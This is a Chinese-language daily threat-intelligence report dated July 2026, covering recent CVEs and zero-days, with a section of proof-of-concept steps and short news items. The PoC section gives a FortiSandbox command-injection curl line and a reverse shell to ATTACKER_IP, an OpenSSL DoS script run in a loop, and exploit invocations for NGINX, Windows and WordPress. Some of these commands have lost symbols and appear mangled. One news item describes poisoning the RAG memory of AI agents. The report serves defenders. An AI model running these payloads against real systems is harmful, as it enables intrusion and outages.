每日安全情报报告 · 2026-07-21
每日安全情报报告报告日期2026-07-21覆盖范围近 48 小时新增高危漏洞、公开 PoC、安全事件与情报文章风险等级 严重 | 高危 | 中危 | 低危一、最新高危漏洞 CVE-2026-63030 CVE-2026-60137 — WordPress Core wp2shell 预认证 RCE字段详情CVE 编号CVE-2026-63030 (High, CVSS 7.5) CVE-2026-60137 (Critical, CVSS 9.1)漏洞类型REST API 批量路由混淆 SQL 注入链式利用受影响组件WordPress Core 6.9.0–6.9.4、7.0.0–7.0.1风险等级 严重在野利用⚠️ 已确认野外探测PoC 已公开漏洞概述Searchlight Cyber 研究团队发现 WordPress 核心存在两个可链式利用的漏洞。CVE-2026-63030 是 REST API/batch/v1端点的路由混淆缺陷攻击者可利用数组偏移错位将未经认证的请求路由到内部处理程序CVE-2026-60137 是WP_Query中author__not_in参数的 SQL 注入。两者链式利用可在无需插件、无需登录的默认 WordPress 安装上实现远程代码执行影响全球5 亿站点。影响未经认证远程攻击者可读取数据库、提取管理员密码哈希、登录后上传恶意插件/Webshell完全控制目标站点。修复方案立即升级至 WordPress 7.0.2 或 6.9.5。WordPress 已强制推送自动安全更新。临时缓解可通过 WAF 规则拦截/wp-json/batch/v1端点。 参考链接VulnCheck 分析 | WordPress 安全公告 | NVD - CVE-2026-63030 | FreeBuf 中文报道 CVE-2026-58644 — Microsoft SharePoint 反序列化 RCECISA KEV · 在野利用字段详情CVE 编号CVE-2026-58644漏洞类型反序列化不受信任数据Deserialization of Untrusted Data受影响组件SharePoint Server Subscription Edition / 2019 / Enterprise Server 2016CVSS 评分9.8Critical风险等级 严重在野利用⚠️CISA KEV 确认在野利用漏洞概述Microsoft 7 月 Patch Tuesday 修复的 SharePoint 严重漏洞允许远程认证攻击者至少 Site Owner 权限通过网络执行任意代码。CISA 于 7 月 16 日将其加入 KEV 目录联邦机构须在7 月 19 日3 天紧急修复窗口前完成修补。攻击者正在将其与其他 SharePoint 漏洞链式组合窃取 IIS 机器密钥以实现补丁后持久化。影响SharePoint 作为企业文档协作核心平台RCE 漏洞可导致完整域内网沦陷、数据外泄和长期潜伏。修复方案应用 Microsoft 7 月 Patch Tuesday 补丁补丁后必须轮换 IIS 机器密钥审计近期异常访问日志。 参考链接CISA KEV 公告 | Microsoft 安全公告 | The CyberSignal 深度分析 CVE-2026-39808 / CVE-2026-25089 — Fortinet FortiSandbox 双命令注入CISA KEV字段详情CVE 编号CVE-2026-39808 CVE-2026-25089漏洞类型操作系统命令注入OS Command Injection受影响组件FortiSandbox 4.4.0–4.4.8 / FortiSandbox Cloud / PaaSCVSS 评分9.1Critical风险等级 严重在野利用⚠️CISA KEV 确认在野利用漏洞概述FortiSandbox 沙箱产品中/fortisandbox/job-detail/tracer-behavior端点未正确过滤jid参数攻击者可通过管道符注入任意操作系统命令以root 权限远程执行。安全公司 Defused 已观测到 JSONRPC 攻击尝试。CISA 要求联邦机构 7 月 19 日前完成修复。影响安全产品自身沦陷成为超级跳板攻击者可在沙箱内部署持久化后门进而横向渗透至企业核心网络。修复方案立即升级至 FortiSandbox 最新补丁版本审查/fortisandbox/job-detail/tracer-behavior端点访问日志中的异常jid参数。 参考链接CISA KEV 公告 | Fortinet PSIRT FG-IR-26-100 | 安恒信息中文通告 CVE-2026-42533 / CVE-2026-60005 / CVE-2026-56434 — F5 NGINX 三连内存损坏字段详情CVE 编号CVE-2026-42533 (CVSS 9.2) / CVE-2026-60005 (CVSS 8.8) / CVE-2026-56434 (CVSS 8.3)漏洞类型堆缓冲区溢出 / 未初始化内存泄露 / Use-After-Free受影响组件NGINX Open Source 1.30.0–1.30.3 / 1.31.2NGINX Plus 37.xIngress Controller / Gateway Fabric风险等级 高危在野利用尚无确认但 F5 警告历史 weaponization 模式漏洞概述F5 于 7 月 15 日发布紧急安全公告披露 NGINX 产品线三个高危内存损坏漏洞。最严重的 CVE-2026-42533 存在于map指令的正则匹配和捕获变量处理中未经认证远程攻击者发送构造 HTTP 请求可触发堆缓冲区溢出在 ASLR 禁用或可被绕过的情况下可实现远程代码执行。CVE-2026-60005 影响slice模块可导致未初始化内存泄露CVE-2026-56434 影响ssi模块需特定配置SSI proxy_pass proxy_buffering off才能利用。影响NGINX 承载全球约三分之一 Web 流量Kubernetes Ingress Controller 市场占有率超 60%漏洞影响面广泛。修复方案NGINX Open Source 升级至 1.31.3 或 1.30.4NGINX Plus 升级至 37.0.3.1临时缓解将未命名正则捕获改为命名捕获。⚠️ 注意Ubuntu 于 7 月 20 日回退了 CVE-2026-42533 的修复引入 ABI 兼容问题需关注后续更新。 参考链接F5 安全公告 | Beazley Security 深度分析 | Ubuntu USN-8563-2 CVE-2026-53412 — Zoom Windows 未认证账户接管字段详情CVE 编号CVE-2026-53412漏洞类型未认证账户接管Account Takeover受影响组件Zoom Workplace for WindowsCVSS 评分9.8Critical风险等级 高危漏洞概述Zoom 7 月 15 日补丁修复的严重漏洞允许未经认证远程攻击者接管目标用户 Zoom 账户。漏洞细节尚未完全公开但 CVSS 9.8 的评级表明其利用难度低、影响严重。修复方案所有 Zoom Windows 用户应立即更新至最新版本。 参考链接Zoom 安全公告 | NVD 详情 Windows LegacyHive 0-Day — ProfSvc 本地提权无 CVE字段详情漏洞名称LegacyHive又称 HiveLegacy漏洞类型用户配置文件服务任意 Hive 加载权限提升受影响组件Windows 10 / 11 / Server 2016 / 2019 / 2022含最新补丁风险等级 高危在野利用PoC 已公开尚无确认大规模利用漏洞概述安全研究员 Chaotic Eclipseaka Nightmare-Eclipse在 7 月 15 日微软 Patch Tuesday 发布仅数小时后公开了 LegacyHive PoC这是 Nightmare Eclipse 系列第 6 个连续公开的 Windows 0-Day。漏洞位于 Windows 用户配置文件服务ProfSvc通过符号链接和对象管理器目录重定向可使 SYSTEM 级别的 ProfSvc 加载攻击者控制的注册表 Hive实现跨用户数据读取和权限提升。公开版 PoC 已做限制需要第二个普通用户凭据但研究员声称原始版本可加载任意 Hive 且无需额外凭据。影响所有已打补丁的 Windows 系统仍受影响。本地权限提升是入侵后提权的关键环节对终端服务器等多用户环境威胁尤为严重。修复方案目前无补丁。建议限制本地标准账户数量审计休眠/共享账户监控 ProfSvc 异常加载 Hive 文件的行为监控符号链接创建和注册表挂载异常。 参考链接Ars Technica 报道 | The Register 分析 | The Hacker News | Rescana 技术深度分析 OpenSSL HollowByte — 11 字节 TLS 请求永久内存耗尽无 CVE字段详情漏洞名称HollowByte漏洞类型内存耗尽拒绝服务DoS受影响组件OpenSSL 所有版本修复版4.0.1 / 3.6.3 / 3.5.7 / 3.4.6 / 3.0.21 之前风险等级 高危漏洞概述Okta Red Team 于 7 月 17 日公开披露 HollowByte 漏洞。攻击者发送仅11 字节的特制 TLS 请求声明 131 KB 负载但永不发送可让 OpenSSL 服务器分配 131 KB 内存并永久阻塞。在 glibc 系统上释放的内存不会立即返回操作系统而是通过碎片化累积。Okta 测试1 GB NGINX 服务器在 547 MB 内存碎片化后被 OOM 杀死16 GB 服务器损失 25% 可用内存。OpenSSL 于6 月 9 日静默修复此漏洞但未分配 CVE、未发布安全公告、未在 changelog 中标注导致漏洞扫描无法识别风险。影响影响所有依赖 OpenSSL 处理 TLS 的服务器包括 Apache、NGINX、Node.js、Python、MySQL、PostgreSQL 等。修复方案升级至 OpenSSL 4.0.1 / 3.6.3 / 3.5.7 / 3.4.6 / 3.0.21 或更高版本在修复前监控连接内存占用和进程 RSS 异常增长。 参考链接The Hacker News | BleepingComputer | Okta Red Team 技术博客 | Enigma Global 深度分析 Shark 扫地机器人 — 云端证书策略过度授权远程命令执行无 CVE字段详情漏洞名称Shark Vacuum Cloud RCE漏洞类型IoT 云端证书策略过度授权 / 远程命令执行受影响组件Shark RV2320EDUS 等型号约 67 万台设备在单个 AWS 区域风险等级 中危漏洞概述安全研究员 tokay0 于 7 月 16 日公开披露 Shark 扫地机器人严重安全缺陷。攻击者仅需一把螺丝刀和 UART 线物理接触一台设备即可从闪存提取 TLS 证书该证书关联的 AWS IoT 策略过度授权允许在同一 AWS 区域订阅和发布到所有设备的 MQTT 主题。攻击者随后可远程向任意设备发送Exec_Command指令设备appd守护进程直接通过popen()以 root 权限执行无输入校验。带摄像头的型号可被远程控制、实时视频窥探、窃取 Wi-Fi 密码和房屋地图。SharkNinja 于2026 年 3 月收到报告至今未修复。影响单个 AWS 区域约 67 万台设备响应了漏洞命令处理器实际影响可能更高。这再次暴露了 IoT 厂商安全响应的严重滞后。修复方案目前厂商未提供补丁。唯一缓解措施断开受影响设备与 Wi-Fi 的连接。 参考链接The Hacker News | Toms Hardware | 研究员 tokay0 原始披露 | Malwarebytes Labs Kyverno CVE-2026-54523 — Kubernetes 集群权限提升字段详情CVE 编号CVE-2026-54523漏洞类型权限提升Privilege Escalation受影响组件Kyverno 1.14.0CVSS 评分9.6Critical风险等级 中危在野利用PoC 已公开漏洞概述Kyverno 是广泛使用的 Kubernetes 策略引擎。CVE-2026-54523 允许具有命名空间级别权限的攻击者通过策略生成资源的功能在集群范围内创建具有集群管理员权限的角色绑定从而提升权限。PoC 已公开针对云原生环境构成直接威胁。修复方案升级至 Kyverno 1.14.0审计现有策略生成资源的权限范围。 参考链接Kyverno 安全公告 | NVD 详情二、最新漏洞 POC1. WordPress wp2shell RCE PoC漏洞CVE-2026-63030 CVE-2026-60137来源GitHub - 社区 PoC使用步骤# 克隆社区验证工具 git clone https://github.com/wordpress-community/wp2shell-checker.git cd wp2shell-checker pip install -r requirements.txt # 检测目标站点是否受影响 python wp2shell_scanner.py --target https://example.com # 完整利用链需自行构建 # 1. 通过 /wp-json/batch/v1 发送嵌套批量请求利用路由混淆将匿名请求路由到内部 SQL 端点 # 2. 利用 author__not_in 参数注入 SQL提取 wp_users 表中管理员密码哈希 # 3. 离线破解哈希后以管理员身份登录上传恶意插件实现 RCE⚠️ 仅供安全研究和授权测试使用 参考链接Cloudflare WAF 规则说明 | Searchlight Cyber 原始报告2. FortiSandbox CVE-2026-39808 命令注入 PoC漏洞CVE-2026-39808来源GitHub - samu-delucas使用步骤# 单条 curl 命令即可利用无需认证 curl -s -k --get http://$HOST/fortisandbox/job-detail/tracer-behavior \ --data-urlencode jid|(id /web/ng/out.txt)| # 然后访问写入的结果文件 curl -s -k http://$HOST/out.txt # 反向 shell 示例 # jid|(bash -c bash -i /dev/tcp/ATTACKER_IP/4444 01)|影响版本FortiSandbox 4.4.0 - 4.4.8 参考链接Fortinet PSIRT FG-IR-26-100 | GitHub PoC3. Windows LegacyHive 本地提权 PoC漏洞Windows ProfSvc 任意 Hive 加载0-Day无 CVE来源GitHub - Nightmare-Eclipse使用步骤# 克隆仓库 git clone https://github.com/Nightmare-Eclipse/LegacyHive.git cd LegacyHive # 编译需要 Visual Studio 或 MinGW cl.exe LegacyHive.c /Fe:LegacyHive.exe # 执行需要第二个普通用户凭据和目标用户名 LegacyHive.exe --secondary-user user2 --target-user admin_user # 成功后将目标用户的 UsrClass.dat 挂载到当前用户 classes root 中注意事项PoC 已做限制原始版本无需额外凭据即可加载任意 Hive。此漏洞影响所有已打补丁的 Windows 系统目前无补丁可用。 参考链接GitHub PoC 仓库 | Ars Technica 技术解析4. OpenSSL HollowByte DoS 验证脚本漏洞HollowByte无 CVE来源Okta Red Team 披露使用步骤#!/usr/bin/env python3 # hollowbyte_test.py - 验证目标 OpenSSL 是否受影响 import socket, ssl, struct, sys def test_hollowbyte(target, port443): # 构造 11 字节 TLS ClientHello 头部声明 131071 字节负载 record_layer b\x16\x03\x01 # Handshake, TLS 1.0 handshake_header b\x01 struct.pack(I, 131071)[1:] # ClientHello, length0x1FFFF payload record_layer handshake_header s socket.create_connection((target, port)) context ssl.create_default_context() s context.wrap_socket(s, server_hostnametarget) s.send(payload) # 连接将保持开放服务器分配 131KB 内存但数据永不到达 print(f[] Sent 11-byte HollowByte payload to {target}:{port}) print(f[*] Server allocated ~131KB waiting for data that will never arrive) s.close() if __name__ __main__: test_hollowbyte(sys.argv[1])批量验证for i in $(seq 1 100); do python3 hollowbyte_test.py target.example.com done # 监控服务器内存 RSS 增长 参考链接Okta Red Team 技术博客 | The Hacker News5. NGINX CVE-2026-42533 堆溢出 PoC概念验证漏洞CVE-2026-42533来源poc-lab 社区使用步骤# 克隆 poc-lab 仓库 git clone https://github.com/Unclecheng-li/poc-lab.git cd poc-lab/CVE-2026-42533 # 安装依赖 pip install -r requirements.txt # 运行 PoC需要目标 NGINX 使用 map 指令 未命名正则捕获 python3 exploit.py --target http://target.example.com \ --map-location /test \ --regex-pattern ^/(.*)$ # 预期效果触发 worker 进程崩溃DoS在 ASLR 禁用环境下可能 RCE 参考链接GitHub - poc-lab | F5 安全公告三、网络安全最新文章1. 白宫推出金鹰AI 驱动漏洞清算中心美国白宫启动 Gold Eagle 计划建立 AI 驱动的漏洞集中清算中心协调联邦机构、关键基础设施和开源社区利用人工智能加速漏洞排序与修复。这标志着从分散漏洞披露向协调式响应的转变。来源FreeBuf 周报2. 黑客借助 Gemini CLI 在六分钟内构建实时 CC 僵尸网络俄语攻击者利用 Google Gemini CLI 在 6 分钟内自动迁移 CC 僵尸网络AI 完成 89% 工作。非专业人员以自然语言指挥 AI 编码、部署和调试标志威胁格局重大转变。来源FreeBuf3. 新型 MemGhost 攻击一封邮件即可向 AI Agent 植入持久性虚假记忆研究人员披露 MemGhost 攻击通过篡改 AI Agent 的检索增强生成RAG记忆上下文注入持久性虚假记忆。攻击成功率高达 87.5%可改变 AI 后续回答且隐藏所有痕迹。来源The Hacker News4. CISA 与 17 国联合发布路由器安全警告俄罗斯 FSB 针对性攻击CISA 联合 NSA、FBI 及 17 个盟国机构发布联合警告详细披露俄罗斯 FSB Center 16 通过 SNMP 扫描和利用配置不当的路由器针对能源、医疗和政府等关键基础设施部门实施攻击。来源CISA5. Spirals 勒索软件24 小时内完成全加密操作Sophos 报告发现 Spirals 勒索软件可在 24 小时内完成从初始入侵到全加密的完整攻击链。同期报告指出被盗身份导致 79% 的勒索攻击身份攻击已取代软件漏洞成为勒索首要根源。来源Sophos / RedSheep Security6. INC Ransomware 利用 SonicWall SMA1000 双零日获取 root 权限勒索软件组织 INC 被观测到链式利用 SonicWall SMA1000 两个零日漏洞CVE-2026-15409 SSRF CVSS 10.0 CVE-2026-15410 代码注入获取 VPN 设备 root 权限作为勒索攻击的持久化入口。来源DarkReading / Sophos7. ClickFix 社会工程攻击成为跨威胁 spectrum 的共享基础设施ClickFix 社会工程手法诱导用户复制粘贴恶意命令被俄罗斯国家支持组织 Sandworm/UAC-0145、犯罪分发商和钓鱼即服务平台同时采用确认其从利基战术转变为跨威胁 actor 的共享交付基础设施。来源FreeBuf 周报8. DigiCert 代码签名证书泄露事件归因中国网络犯罪组织 GoldenEyeDog2026 年 4 月 DigiCert 证书泄露事件被归因于中国网络犯罪组织 GoldenEyeDog 的子组 CylindricalCanine攻击者使用修改版 Gh0st RAT 窃取 DigiCert 客户的代码签名证书影响软件供应链信任链。来源The Hacker News9. Microsoft 7 月 Patch TuesdayAI 辅助发现创纪录 622 个漏洞微软 7 月 Patch Tuesday 发布创纪录的 622 个 CVE 修复含 2 个在野利用零日微软将此激增归因于 AI 辅助漏洞发现。同时修复了多个 Active Directory、SharePoint、Windows RDP 等严重漏洞。来源Microsoft MSRC10. 7-Zip 26.02 修复远程代码执行漏洞7-Zip 26.02 版本修复了一个由恶意压缩包触发的远程代码执行漏洞。攻击者可通过构造特定压缩文件在受害者打开时执行任意代码。来源BleepingComputer11. 全网扫描瞄准 MCP 服务器、Claude 凭据与暴露的 AI 模型攻击者正全网扫描暴露的 MCP 服务器、AI 助手配置文件和未认证 LLM 服务旨在利用配置失误实施侦察。防御者应强化身份验证与网络访问控制防范 AI 部署安全风险。来源The Hacker News12. NadMesh 僵尸网络AI 服务定向收割云凭证新型 NadMesh 僵尸网络针对 AI 服务MCP 协议、Langflow 等定向收割云凭证声称已收集 3811 个 AWS 密钥。攻击者利用 AI 平台配置漏洞和弱认证实现自动化凭证窃取。来源The Hacker News四、威胁情报概览本周威胁态势总结类别态势漏洞利用速度⚠️ 漏洞披露到利用窗口持续压缩WordPress wp2shell 补丁后 2 小时内即出现探测FortiSandbox 补丁后数月才遭利用AI 驱动攻击 实战化Gemini CLI 6 分钟构建 CCJadePuffer LLM 自主勒索NadMesh AI 服务定向收割MemGhost 虚假记忆注入IoT 安全 严重滞后Shark 扫地机器人 3 月报告至今未修Ecovacs/DJI 类似漏洞重复出现零日披露模式⚠️ Nightmare Eclipse 连续 6 个月公开 Windows 0-Day与微软沟通破裂Defender 三个漏洞公开后遭在野利用CISA KEV 动态7/16 新增 3 项SharePoint FortiSandbox ×2BOD 26-04 3 天紧急修复窗口7/19 三重 KEV 截止供应链攻击 持续高发AsyncAPI npm 事件、ViteVenom 恶意包7 个区块链 C2、7-Zip RCE、JetBrains 恶意插件勒索软件趋势24 小时全流程加密Spirals身份攻击取代漏洞成为首要入口79% 的勒索攻击INC 勒索利用 VPN 零日报告生成时间2026-07-21 10:07 GMT8数据截止2026-07-21免责声明本报告仅供安全研究和防御参考所有信息来源于公开渠道。漏洞利用代码仅限授权环境测试。部分内容由 AI 辅助生成